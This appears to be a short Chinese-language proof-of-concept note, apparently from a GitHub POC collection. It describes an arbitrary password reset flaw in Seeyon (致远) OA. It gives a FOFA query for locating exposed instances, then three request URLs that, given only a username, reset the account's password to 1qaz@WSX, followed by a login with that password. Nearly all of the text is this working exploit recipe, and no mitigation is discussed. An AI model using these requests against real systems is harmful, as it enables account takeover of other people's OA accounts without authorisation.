致远前台任意用户密码修改
fofa
app="致远互联-OA"
漏洞复现
前提需要知道用户名
http://xx.xx.xx.xx/seeyon/personalBind.do?method=retrievePassword
<img width="1057" alt="image-20240301101704702" src="https://github.com/wy876/POC/assets/139549762/9562a165-151e-421c-a26c-7e09bf199368">
http://xx.xx.xx.xx/seeyon/personalBind.do?method=sendVerificationCodeToBindNum&type=validate&origin=zx
<img width="1047" alt="image-20240301101722837" src="https://github.com/wy876/POC/assets/139549762/c1ea9e86-1a92-4aaa-945d-a1a45c83509e">
修改密码为1qaz@WSX
http://xx.xx.xx.xx/seeyon/individualManager.do?method=resetPassword&nowpwd=1qaz@WSX
<img width="1217" alt="image-20240301101802224" src="https://github.com/wy876/POC/assets/139549762/5375cccc-0a9b-4ae0-8e3e-177aa67290b1">
最后使用修改的密码登录
<img width="1054" alt="image-20240301101840756" src="https://github.com/wy876/POC/assets/139549762/261afdc9-a728-4302-96a6-e0e19d02d338">
闽公网安备35020302035932号